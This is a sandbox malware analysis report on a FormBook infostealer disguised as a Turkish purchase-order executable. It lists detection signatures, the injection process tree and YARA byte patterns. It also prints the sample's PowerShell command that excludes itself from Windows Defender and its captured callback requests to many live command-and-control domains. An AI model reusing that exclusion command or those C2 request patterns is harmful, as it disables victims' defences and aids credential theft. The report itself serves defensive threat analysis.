Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe

Overview

General Information

Sample name:03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
renamed because original name is a hash value
Original sample name:03.07.2024-sipari UG01072410 - Onka ve Tic a.s .exe
Analysis ID:1467071
MD5:860575aa9868349d8cbdbe70d45098c5
SHA1:6d4f34011c4a7f06ee54a15b091e0566fc38ac78
SHA256:88fcbe786b16f3cbb9292ed742d3e284d1936b20e4567cd0318effefd61fc176
Tags:exegeoTUR
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe (PID: 7512 cmdline: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" MD5: 860575AA9868349D8CBDBE70D45098C5)
    • powershell.exe (PID: 7672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe (PID: 7680 cmdline: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" MD5: 860575AA9868349D8CBDBE70D45098C5)
      • akwoJPEqdiyPQmCnaGzo.exe (PID: 6092 cmdline: "C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fc.exe (PID: 7280 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
          • akwoJPEqdiyPQmCnaGzo.exe (PID: 3716 cmdline: "C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7656 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2aca0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2aca0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2de23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17392:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16592:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ParentProcessId: 7512, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ProcessId: 7672, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ParentProcessId: 7512, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ProcessId: 7672, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ParentProcessId: 7512, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ProcessId: 7672, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeReversingLabs: Detection: 34%
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeJoe Sandbox ML: detected
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: fc.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fc.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rZwD.pdbSHA256 source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: Binary string: rZwD.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2056801260.000000000083E000.00000002.00000001.01000000.0000000C.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4151437192.000000000083E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003ABF60 FindFirstFileW,FindNextFileW,FindClose,9_2_003ABF60
            Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax9_2_00399670
            Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi9_2_003A245D
            Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h9_2_0302053E

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.qdfake525pm.xyz
            Source: Joe Sandbox ViewIP Address: 38.150.29.6 38.150.29.6
            Source: Joe Sandbox ViewIP Address: 38.150.29.6 38.150.29.6
            Source: Joe Sandbox ViewIP Address: 162.0.213.72 162.0.213.72
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /a24j/?lxRlvTSh=RsceReT900EWT/dwsr4j9O4BlXzkLceVZQ7aWeUSP6prvEVffZLEO15AIWxlHKHabVj2I55FGLI5L0C49uGheAnDVqmJ9AiU0eI6N3YkeR21zvyMSZqsHmQ=&kh=9PxLvhoHS4 HTTP/1.1Host: www.qdfake525pm.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /ooz9/?lxRlvTSh=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&kh=9PxLvhoHS4 HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /el0d/?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.katgstamps.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /nm4d/?lxRlvTSh=P+a6bS4ig9vwqW/Z6ilpMEzKmUBtQAyMrIuXDLnJaK725R5zxskqpas4OYRfTGLo7FbtQu2SDY/2/wEY0mHxpB/VyP4fcE5gLsO9P5KmHmpeamOBXX7CtdE=&kh=9PxLvhoHS4 HTTP/1.1Host: www.devele.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /k2gj/?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS4 HTTP/1.1Host: www.valerieomage.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /m0xz/?lxRlvTSh=mXjiODcdBBXx02CT+mommPNahBZnOONdEz0dJALDPbptcbrNH3E9vFlm0oQl87Jfr/zi8sA6LXl9HQJlpR4v66WH/OKR7mDYMhPXwYhk+M55Q9NgI1iegHg=&kh=9PxLvhoHS4 HTTP/1.1Host: www.hissmjkl.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /735n/?lxRlvTSh=KJAlFkGNwGXoK9jXB03h4jJMHTy8Y0+g9t3JgJmyeOCBT/uylrmuLZmon7piRwxkAvV6Iq7XsIFI/+KtRdw7O50MagBKJtHJjM3XcudO1Duzw6d1NcP9VI8=&kh=9PxLvhoHS4 HTTP/1.1Host: www.monchosoft.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /4h78/?lxRlvTSh=bXG7bLU8VpdhFuw8OEWepvz+lmtIgfU4QefCRLOwt0xUHukcXkmHP9rgqbjL97YnLUFJGTOXt4l1DZESwR3Y2jPuWZfGScD+gHNftK8/3r/KPWW9Eddz3K4=&kh=9PxLvhoHS4 HTTP/1.1Host: www.theweekendcreator.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /hfb9/?lxRlvTSh=fwSRWDIDlEtpZKpO15TnR7rdvvbvUQOUwoPVjl38Pi8M+UCq29ZeNKRmFQz0yoK86tSBJtX0+7UQykNFUthSdrPfT9CD49CruGe2y7ZC/ovpvsGUE+526xA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.saalameh.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /0ag0/?lxRlvTSh=ijsxwTuQWQMrQrpunY58zmHtK7oEhmVQOqZdZNdH7TeXDSEes5ptIscTzSElyzixUNFuHL69iVpfwUSC4AMHMDnys0WZTFD5qHcVGhhYgxj+QsPKbvjZ0mA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.ybw73.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /tqvk/?lxRlvTSh=sqV4H0HgKEmT+MSVPZvHtNNOCugFouPGcNtakGXEq4+Q8zlVn8x6bNcZA2Wcm7hNKJFeivErhIl2wMRsNIGAokWHBtGrsDvz+bZZo+cuUvU/JTN/Qn5+SZw=&kh=9PxLvhoHS4 HTTP/1.1Host: www.kaps4kancer.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.qdfake525pm.xyz
            Source: global trafficDNS traffic detected: DNS query: www.com-kh.com
            Source: global trafficDNS traffic detected: DNS query: www.ddi828media.com
            Source: global trafficDNS traffic detected: DNS query: www.miningarea.fun
            Source: global trafficDNS traffic detected: DNS query: www.66hc7.com
            Source: global trafficDNS traffic detected: DNS query: www.katgstamps.com
            Source: global trafficDNS traffic detected: DNS query: www.devele.top
            Source: global trafficDNS traffic detected: DNS query: www.valerieomage.com
            Source: global trafficDNS traffic detected: DNS query: www.hissmjkl.com
            Source: global trafficDNS traffic detected: DNS query: www.monchosoft.com
            Source: global trafficDNS traffic detected: DNS query: www.theweekendcreator.com
            Source: global trafficDNS traffic detected: DNS query: www.saalameh.com
            Source: global trafficDNS traffic detected: DNS query: www.ybw73.top
            Source: global trafficDNS traffic detected: DNS query: www.kaps4kancer.org
            Source: global trafficDNS traffic detected: DNS query: www.vivemasvivebien.com
            Source: unknownHTTP traffic detected: POST /ooz9/ HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 205Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.66hc7.comReferer: http://www.66hc7.com/ooz9/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like GeckoData Raw: 6c 78 52 6c 76 54 53 68 3d 42 6e 74 6d 78 66 4a 6a 4a 43 6f 51 61 72 77 6e 41 36 4f 46 62 6a 6d 50 67 66 35 62 43 67 6b 54 41 33 68 75 43 6b 34 38 68 6b 43 50 63 6a 70 42 4c 37 45 53 33 72 6d 70 59 51 32 48 4b 4a 4d 46 2b 73 4a 46 6e 78 74 38 34 41 5a 74 6c 56 73 36 4c 7a 52 31 32 5a 55 57 72 75 62 36 34 69 51 66 42 6c 47 31 4b 56 54 6d 61 69 30 35 62 66 50 7a 68 73 34 57 78 4f 7a 54 66 4a 76 68 38 43 4b 31 56 51 76 39 36 4e 62 35 67 48 64 58 78 4d 74 61 2f 75 78 5a 34 47 59 62 41 33 76 34 43 63 46 30 46 4e 48 50 35 49 51 46 75 73 36 62 78 39 6a 76 63 47 4e 36 69 38 2b 7a 6c 71 44 63 79 6c 59 6e 56 41 3d 3d Data Ascii: lxRlvTSh=BntmxfJjJCoQarwnA6OFbjmPgf5bCgkTA3huCk48hkCPcjpBL7ES3rmpYQ2HKJMF+sJFnxt84AZtlVs6LzR12ZUWrub64iQfBlG1KVTmai05bfPzhs4WxOzTfJvh8CK1VQv96Nb5gHdXxMta/uxZ4GYbA3v4CcF0FNHP5IQFus6bx9jvcGN6i8+zlqDcylYnVA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 03 Jul 2024 15:46:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 2001Connection: closeData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 30 3b 0a 09 09 09 7d 0a 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 46 45 46 45 46 3b 0a 09 09 09 09 66 6f 6e 74 3a 20 2e 39 65 6d 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 77 72 61 70 70 65 72 7b 0a 09 09 09 09 77 69 64 74 68 3a 36 30 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 34 30 70 78 20 61 75 74 6f 20 30 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 33 29 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 